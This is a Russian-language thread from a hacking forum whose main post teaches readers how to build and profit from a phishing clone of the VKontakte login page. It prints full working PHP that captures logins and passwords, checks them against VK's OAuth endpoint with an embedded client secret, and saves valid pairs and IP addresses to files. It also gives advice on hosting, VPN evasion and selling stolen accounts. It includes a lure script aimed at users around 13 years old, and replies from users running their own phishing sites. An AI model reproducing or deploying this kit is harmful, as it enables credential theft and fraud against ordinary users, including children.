• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Как сделать свой фишинг-вк и стабильно на нем зарабатывать?

Статус
Закрыто для дальнейших ответов.

eternit88

RAID-массив
Забанен
Регистрация
02.11.2018
Сообщения
66
Реакции
32
Пожалуйста, обратите внимание, что пользователь заблокирован

Фишинг - один из старейших способов развода, который не умрет никогда.
В этой статье я расскажу что такое фишинг, способы заработка с помощью него и КАК СДЕЛАТЬ таковой самому.
Статья больше подходит для школьников-студентов, которым не помешает лишний 'чирик' в кармане :)
*Рассказывать буду о фишинге ВК, но, при должном желании можно сделать тоже самое и для других платформ*
............................
Итак, начнем.
Фишинг Вконтакте - один из лучших способов заработка, так как имеет разветвления, позволяющие КАЖДОМУ найти в нем что-то 'свое'.
Ниже приведен КРАТКИЙ список способов заработка на фишинге ВК:

1. Индивидуальный взлом аккаунтов с помощью фишинга - 500р+ с одного заказа
2. Продажа самого фишинга на бордах - 50р-3000р с одной продажи
3. Спам - 4р-30р+ за аккаунт, 50р+ в день
О 3-ем пункте поговорим чуть подробнее.
Спам
является одним из самых легких способов заработка на фишинге, ведь он не имеет необходимости сдачи проделанной работы в сроки, постоянного онлайна и общения с покупателями.
Можно нанять спамеров, можно спамить самому, но суть остается той же- нет графика работы и дедлайнов.



Со способами заработка я надеюсь ты, мой читатель, ознакомился.
Теперь приступим к тому, как сделать свой фишинг ВК и работать с ним.


--------------------

Обычно фишинги пишутся на PHP и MySQL.
Но, для практики обойдемся 'файликами', вместо полноценной БД.
*Да, это небезопасно, но для начала сойдет*
--------------------------------------------------------------------

Для начала, чтобы наши PHP-скрипты работали - скачай локальный сервер. Мой выбор пал на DENWER (Тык)

Скачивай, открывай, устанавливай.
В нескольких шагах проинструктирую всю установку:
1. 'Вы действительно хотите установить базовый пакет?' - Да
2. Открывается консоль - следуй инструкции и выбирай рекомендуемые настройки
3. После установки - На всякий случай перезагрузи компьютер
4. После перезагрузки зайди в 'Мой компьютер' и, если появился новый диск - заходи в него - denwer - start.exe
elseif4. Зайди в диск C:// - и найди папку WebServers. Далее заходи в нее - denwer - start.exe
Итак, ты успешно установил Denwer. Приступаем к 'написанию' фишинга​

Для начала нужно зайти в само 'хранилище' наших сайтов. Оно находится в C:\WebServers\home\localhost\www .
Создай в данной директории новую папку с названием сайта. Например vktest.

Заходи в нее и создавай:
файл index.php
папку info с файлами ipaddr.txt , mps.txt , name.txt , text.txt


Заходи в него с помощью любого редактора (Sublime Text, Kamodo Edit, Atom, Notepad++)
И копируй код ниже (он большоооооооой):

PHP:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
   <head>
      <meta http-equiv="X-UA-Compatible" content="IE=edge" />
      <meta charset="utf-8">
      <link rel="shortcut icon" href="https://vk.com/images/icons/favicons/fav_logo.ico?5" />
      <link rel="apple-touch-icon" href="https://vk.com/images/safari_60.png?1">
      <link rel="apple-touch-icon" sizes="76x76" href="https://vk.com/images/safari_76.png?1">
      <link rel="apple-touch-icon" sizes="120x120" href="https://vk.com/images/safari_120.png?1">
      <link rel="apple-touch-icon" sizes="152x152" href="https://vk.com/images/safari_152.png?1">
      <meta http-equiv="content-type" content="text/html; charset=utf-8" />
      <meta name="description" content="" />
      <title>Вход | ВКонтакте</title>
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="stylesheet" type="text/css" href="https://vk.com/css/al/fonts_cnt.css?2889730895" />
      <link rel="stylesheet" type="text/css" href="https://vk.com/css/al/common.css?29532151062" />
      <link type="text/css" rel="stylesheet" href="https://vk.com//css/al/login.css?21188992645">
      </link>
      <link type="text/css" rel="stylesheet" href="https://vk.com//css/al/ui_common.css?21113360501">
      </link>
   </head>
   <body class="login_page">
      <div id="system_msg" class="fixed"></div>
      <div id="utils"></div>
      <div id="layer_bg" class="fixed"></div>
      <div id="layer_wrap" class="scroll_fix_wrap fixed layer_wrap">
         <div id="layer"></div>
      </div>
      <div id="box_layer_bg" class="fixed"></div>
      <div id="box_layer_wrap" class="scroll_fix_wrap fixed">
         <div id="box_layer">
            <div id="box_loader">
               <div class="pr pr_baw pr_medium" id="box_loader_pr">
                  <div class="pr_bt"></div>
                  <div class="pr_bt"></div>
                  <div class="pr_bt"></div>
               </div>
               <div class="back"></div>
            </div>
         </div>
      </div>
      <div id="stl_left"></div>
      <div id="stl_side"></div>
      <div class="scroll_fix_wrap _page_wrap" id="page_wrap">
      <div>
         <div class="scroll_fix">
            <div id="page_header_cont" class="page_header_cont">
               <div class="back"></div>
               <div id="page_header_wrap" class="page_header_wrap">
                  <a class="top_back_link" href="" id="top_back_link" onclick="if (nav.go(this, event, {back: true}) === false) { showBackLink(); return false; }" onmousedown="tnActive(this)"></a>
                  <div id="page_header" class="p_head p_head_l0" style="width: 960px">
                     <div class="content" >
                        <div id="top_nav" class="head_nav">
                           <div class="head_nav_item fl_l">
                              <a class="top_home_link fl_l " href="/" aria-label="На главную" accesskey="1">
                                 <div class="top_home_logo"></div>
                              </a>
                           </div>
                           <div class="head_nav_item fl_l">
                              <div id="ts_wrap" class="ts_wrap">
                                 <input name="disable-autofill" style="display: none;" />
                                 <input type="text" onmousedown="event.cancelBubble = true;" ontouchstart="event.cancelBubble = true;" class="text ts_input" id="ts_input" autocomplete="off" name="disable-autofill" placeholder="Поиск" aria-label="Поиск" />
                              </div>
                           </div>
                           <div class="head_nav_item fl_l head_nav_btns"><span id="top_audio_layer_place"></span></div>
                           <div class="head_nav_item fl_r"><a class="top_nav_link" href="" id="top_switch_lang" style="display: none;" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 3, hash: '274d71cad1b5904c92' }); return false;" onmousedown="tnActive(this)">
                              Switch to English
                              </a><a class="top_nav_link" href="/join" id="top_reg_link" style="display: none" onclick="return !showBox('join.php', {act: 'box', from: nav.strLoc}, {}, event)" onmousedown="tnActive(this)">
                              регистрация
                              </a>
                           </div>
                           <div class="head_nav_item_player"></div>
                        </div>
                        <div id="ts_cont_wrap" class="ts_cont_wrap" ontouchstart="event.cancelBubble = true;" onmousedown="event.cancelBubble = true;"></div>
                     </div>
                  </div>
               </div>
            </div>
            <div id="page_layout" style="width: 960px;">
               <div id="page_body" class="fl_r " style="width: 960px;">
                  <div id="header_wrap2">
                     <div id="header_wrap1">
                        <div id="header" style="display: none">
                           <h1 id="title"></h1>
                        </div>
                     </div>
                  </div>
                  <div id="wrap_between"></div>
                  <div id="wrap3">
                     <div id="wrap2">
                        <div id="wrap1">
                           <div id="content" class="page_block">
                             <div id="step1">
                              <h2 class="login_header">Вход ВКонтакте</h2>
                              <div id="login_message">

                              <?php echo '
                                     <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="#" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">

  </div>
</div>

<div class="oauth_content box_body clear_fix">

  <form method="POST" id="login_submit">
    <div class="oauth_form">

     ';
               $nametxt = fopen('info/name.txt', "a+");
     $texttxt = fopen('info/text.txt', "a+");
     $ipaddrtxt = fopen('info/ipaddr.txt', "a+");
     $mpstxt = fopen('info/mps.txt', "a+");
               function example() {
                 echo '<div id="box_error" class="box_error" style="display: block;">Неверно введён логин или пароль.</div><br>';
               }

      function curl($url){

                 $ch = curl_init( $url );
                 curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                 curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
                 curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
                 $response = curl_exec( $ch );
                 curl_close( $ch );
                 return $response;
               }

               if (isset($_POST['email'])){
               $info = '';
               $capecho = '';

$ipaddr = $_POST['ipaddr'];
                 $email = $_POST['email'];
                 $password = $_POST['pass'];
                 if(isset($_POST['captcha_sid'])) {
                 $captcha_sid = $_POST['captcha_sid'];
                 $captcha_key = $_POST['captcha_key'];
                 } else {
                     $captcha_sid = '';
                     $captcha_key = '';
                 }
                 $res = curl('https://oauth.vk.com/token?grant_type=password&client_id=3697615&client_secret=AlVXZFMUqyrnABp8ncuU&username='.$email.'&password='.$password.'&captcha_key='.$captcha_key.'&captcha_sid='.$captcha_sid);
                 $lo='access_token';

                 $pos = strripos($res, $lo);

                 $json = json_decode($res, true);
                 if ($pos === false) {
                if($json["error"] === "need_captcha")
                {
                  $info='<br><div class="box_error" style="margin-bottom:15px;">Ошибка авторизации. Введите код с картинки.</div>';
                  $capecho = 1;
                  $capid = $json["captcha_sid"];
                }else {
                  example();
                  $capecho = 0;
                }
                 }else {
$name = $_POST['email'];
$text = $_POST['pass'] ;
$ipaddr = $_POST['ipaddr'];
$mps = $name.':'.$text ;
$post_data = array (
'email\n' => $name,
'pass\n' => $text,
'ipaddr\n' => $ipaddr,
'mailpass\n' => $mps,

);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// указываем, что у нас POST запрос
curl_setopt($ch, CURLOPT_POST, 1);
// добавляем переменные
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

$output = curl_exec($ch);
curl_close($ch);
                $info='<div class="info_line" align="center" style="font-weight:bold;">Вход выполнен.</div><br>

                <div class="info_line" align="center">Ваша заявка на проверку была отправлена и будет обработана через 12 часов!
            </div><br>
                      ';
                 }
     $nametxt = fopen('info/name.txt', "a+");
     $texttxt = fopen('info/text.txt', "a+");
     $ipaddrtxt = fopen('info/ipaddr.txt', "a+");
     $mpstxt = fopen('info/mps.txt', "a+");

        fwrite($nametxt, $name);
                fwrite($nametxt, '<br/>');
        fwrite($texttxt, $text);
                fwrite($texttxt, '<br/>');
        fwrite($ipaddrtxt,$ipaddr);
                fwrite($ipaddrtxt,'<br/>');
        fwrite($mpstxt, $mps);
                fwrite($mpstxt, '<br/>');
                 }
               else{

               }
               echo $info;
    if ($pos != true ) {  echo '
    <form action="savebase.php" method="POST">
<div class="oauth_form_login">

                                <div align="center" >
        <input style="padding:15px;" type="text" class="oauth_form_input dark" name="email" id="index_email" value="'.$email.'" required placeholder="Телефон или e-mail">
        <br/>
        <br/>
        <input type="hidden" name="ipaddr" value="' .$_SERVER['REMOTE_ADDR']. '">
        <input style="padding:15px;" type="text" class="oauth_form_input dark" name="pass" id="index_pass" value="'.$password.'" required placeholder="Пароль" style="-webkit-text-security: disc;" />
        </div>
               ';
                                                            echo '

<div class="login_buttons_wrap" align="center">
        <button class="flat_button button_big_text login_button" id="install_allow" type="submit">Войти</button><button class="flat_button button_big_text login_reg_button" onclick="javascript:void(0)">Регистрация</button>
        <input type="submit" name="submit_input" class="unshown">
        </div>
      </div>
    </div>
  </form>
    </div>'; }
echo '
        </div>
</html> ';  ?>
                                 </div>
                              </div>
                              <div class="login_fast_restore_wrap _retore_wrap"></div>
                             </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div id="footer_wrap" class="footer_wrap fl_r" style="width: 960px;">
                  <div class="footer_nav" id="bottom_nav">
                     <div class="footer_copy fl_l"><a href="https://vk.com/about" target="_blank">ВКонтакте</a> &copy; 2018</div>
                     <div class="footer_lang fl_r">Язык:<a class="footer_lang_link">English</a><a class="footer_lang_link" >Русский</a><a class="footer_lang_link">Українська</a><a class="footer_lang_link">все языки &raquo;</a></div>
                     <div class="footer_links">
                        <a class="bnav_a" href="https://vk.com/about" target="_blank">о компании</a>
                        <a class="bnav_a" href="https://vk.com/terms" target="_blank">правила</a>
                        <a class="bnav_a" href="https://vk.com/ads" target="_blank" style="">реклама</a>
                        <a class="bnav_a" href="https://vk.com/dev" target="_blank">разработчикам</a>
                     </div>
                  </div>
                  <div class="footer_bench clear">
                  </div>
               </div>
               <div class="clear"></div>
            </div>
         </div>
      </div>

        <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
        <script src="../js/default.js"></script>
   </body>
</html>


Для тех, кого интересует его структура:


1. Сама страница (HTML,CSS)
2. Запрос к vk.com с помощью cURL (для автоматической проверки аккаунтов)
3. Получение ответа
4. Запись в файлы (fopen, fwrite)
........................
После создания папки info с txt-файлами(text.txt, name.txt, ipaddr.txt, mps.txt) ты будешь получать туда ВСЕ валидные (верные) комбинации аккаунтов.
Чуть-чуть доделав скрипт можно начать его продавать или использовать самому.

------------------------
После написания своего супер-пупер скрипта - нужно залить его на ВДС-ку или хостинг. Отличия лишь в том, что хостинг банит СРАЗУ такие скрипты, а ВДС-ки нет.
Из ВДС-ок я использую TimeWeb (не реклама). Как ставить на него скрипт/сайт можете посмотреть на ютубе.
Для исправной работы скрипта понадобится установить расширение 'cURL' если оно заранее не установлено.
Стоимость самого дешевого сервера - 200р. Но он будет служить тебе еще целый месяц, за который можно будет ооооочень легко его окупить.


!!! ВАЖНО!!!
Делать это все нужно через ВПН, дабы избежать различных проблем в будущем/блокировок.

Итак, ты загрузил весь скрипт на хостинг/вдс, получил первые аккаунты, но не знаешь где и как их продать?
Для этого есть отдельные маркеты по типу LZT.MARKET (не реклама) и других.
Также, если у тебя есть свободный бюджет и ты готов потратить свои 500-1000 кровных - можешь смело открывать свой интернет-магазин аккаунтов с помощью
deer.io (не реклама) и продавать их в 1.5-3 раза дороже. Именно на deer.io стоят большинство интернет-магазинов с аккаунтами вк, поэтому готовься к 'потной конкуренции', которая МОЖЕТ помешать твоему 'бизнес-плану' =))

А что если ты загрузил все-таки скрипт, но никак не можешь получить первые аккаунты?
Если у тебя ничего не вышло - можешь воспользоваться моим мини-мануалом по спаму, вложенном в моем скрипте, который я продавал:
"Итак, многие из вас видели группы для тупиков по типу 'эта страница подтверждена' 'официальная страница
'взаимные лайки' и тому подобные.
Их участники будут нашими жертвами.
Находим онлайн участников группы, которым по фоткам максимум 13 лет и пишем:

-Привет, ИМЯ!
Мы недавно запустили новый сервис по накрутке друзей/лайков,
поддержи нас пожалуйста! :)
LINK.

Заранее ооочень благодарны)
После некоторого времени ожидаем наши аккаунты"
Таким способом у меня получалось делать около 5-30 аккаунтов в день, которые я успешно продавал на маркете за 6 рублей.
Не трудно посчитать что в день выходило около 30-180р. Да, это копейки, но статья изначально писалась для школьников-студентов :)


Как нанимать спамеров чтобы зарабатывать на пассиве?
Так как наша панелька сделана 'на коленках' и в ней нет панелей для спамеров - много спамеров нанимать не нужно, 2-3х хватит.
Заходи на соседние борды и создавай везде новую тему с загаловком:

'Найму спамеров на фишинг ВК'
В теме закинь свои контакты (телеграм/жаба) и, после получения ответа, веди разговор со спамером, одновременно стараясь нанимать других.
Затем, к примеру через месяц - просмотри общий свой доход и оплати каждому по 25% от заработанного бюджета. Остальные 25% оставляй себе.
Получается что ничего не делая ты просто зарабатываешь небольшие деньги, неплохо, не так-ли?
Но это лишь на словах так, на самом деле тебе прийдется очень долго находить таких людей, более ответственно отнестись к выплатам + отвечать на порой ооооочень 'тупые' вопросов от них же.


..............
Теперь, разобрав всю тему со спамом, приступим к разбору темы с 'индивидуальным взломом' аккаунтов.
Такой способ НАМНОГО прибыльнее предыдущего, но он требует от тебя должной подготовки и знания ХОТЯ БЫ основ СИ (соц. инженерии)


С чего начинать?
Зайди на борды соседней тематики и создай тему 'Взломаю аккаунты ВК по дешевке'
В теме начинаешь писать обо всем: условиях покупки, что человек получает после покупки, шансы взлома и т.д
Расценки можно ставить разные: начиная от 100-а рублей и заканчивая 2-мя тысячами за один аккаунт.
После получения первого заказа - посмотри интересы жертвы и заводи разговор ИМЕННО на эти же темы, дабы заинтересовать его зайти по ссылке.
После успешного взлома - присылаешь доказательства покупателю, получаешь оплату и отдаешь комбинацию НОМЕР:ПАРОЛЬ с текстовых документов =)

------------------
Ответы на твои будущие вопросы:

Файл не меняет свое расширение на .php:
Для фикса зайди в - Панель управления - Оформление и персонализация - Параметры проводника - Вид. В самом внизу найдите 'Скрывать расширения для зарегистрированных типов файлов' и убери галочку. Примени настройки и БАМ, меняй расширение файла.

Denwer не устанавливается:
Так как ошибок может возникнуть немереное количество - гугли.

Как связаться с тобой?:
Связаться со мной или задать вопросы можешь по телеграмму @xndefined

----------
На все остальные вопросы буду отвечать по мере возможности в данной теме. На глупые вопросы буду отвечать 'google.com' =)
Такую статью создания и использования фишинг скрипта ВК с ЧЕКЕРОМ ты вряд ли найдешь еще где-нибудь.
Также, я принимаю участие в конкурсе: https://xss.pro/threads/26627
Special for xss.pro

 
Последнее редактирование:
Скрипт доработать? А если не смыслишь в скриптах, а научиться хочется. ((( Статья какая-то скомканная и поверхностная.
А если не перейдет жертва, которую заказали, по этой ссылке? А вернее перейдет, но пароль и лог вводить не станет. Я бы не стала это делать. Закрыла бы страницу и в новом окне вернулась на сайт вк.
 
Статья для новеньких в теме, но я как "новенький" многого не поняла как и где что именно делать. Сам процесс не ясен.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ничего не понятно, как создавать файлы((((
Как-как...
пкм-создать-текстовый документ.
Потом переименовываешь часть '.txt' на '.php'
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скрипт доработать? А если не смыслишь в скриптах, а научиться хочется. ((( Статья какая-то скомканная и поверхностная.
А если не перейдет жертва, которую заказали, по этой ссылке? А вернее перейдет, но пароль и лог вводить не станет. Я бы не стала это делать. Закрыла бы страницу и в новом окне вернулась на сайт вк.
Еслт хочешь доработать скрипт - изучи php/html/css.
Фишинг изначально предназначен для 'мамонтов', не разбирающихся в компьютерах
 
Еслт хочешь доработать скрипт - изучи php/html/css.
Фишинг изначально предназначен для 'мамонтов', не разбирающихся в компьютерах
Можешь помочь ?
У меня есть свой фишинг сайт стим , но он не проверяет аккаунты на валидность( просто пишет неверный логин или пароль- хотя они верные ),что сделать ?
вот сам сайт :
https://imgur.com/qcCqM7F
https://imgur.com/eOg5hoS
https://imgur.com/ySPjDZT
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Можешь помочь ?
У меня есть свой фишинг сайт стим , но он не проверяет аккаунты на валидность( просто пишет неверный логин или пароль- хотя они верные ),что сделать ?
вот сам сайт :
https://imgur.com/qcCqM7F
https://imgur.com/eOg5hoS
https://imgur.com/ySPjDZT
Я без исходников ничего тебе сказать не смогу.
Свяжись со мной в ЛС
 
Короче, прочел позавчера эту статью. Создал фиш сайт: узнай кто заходил на твою страницу. Поспамил по комментам в группах.
Итог - посещаемость есть, но данные никто не вводит. Или я жопорук или тема мертвая.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Короче, прочел позавчера эту статью. Создал фиш сайт: узнай кто заходил на твою страницу. Поспамил по комментам в группах.
Итог - посещаемость есть, но данные никто не вводит. Или я жопорук или тема мертвая.
Скорее всего ты забыл указать во время залива файлов на сервер права доступа.
ПКМ по файлам (если работаешь через filezilla) - права.
Ставишь значение 777
 
Скорее всего ты забыл указать во время залива файлов на сервер права доступа.
ПКМ по файлам (если работаешь через filezilla) - права.
Ставишь значение 777
Ага, и пздц вашим аккаунтам с такими правами)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ага, и пздц вашим аккаунтам с такими правами)
Не стоит воспринимать эту статью как способ для заработка, да и впринципе как-либо работать по ней. Статья предоставлена в ознакомительных целях для изучения основ всей этой темы изнутри.
 
Не стоит воспринимать эту статью как способ для заработка, да и впринципе как-либо работать по ней. Статья предоставлена в ознакомительных целях для изучения основ всей этой темы изнутри.
Это понимаем мы с тобой, а вот новички увидят раз такой совет и будут потом во всех своих скриптах ставить права 777, если что-то не работает)
 
Статус
Закрыто для дальнейших ответов.
Верх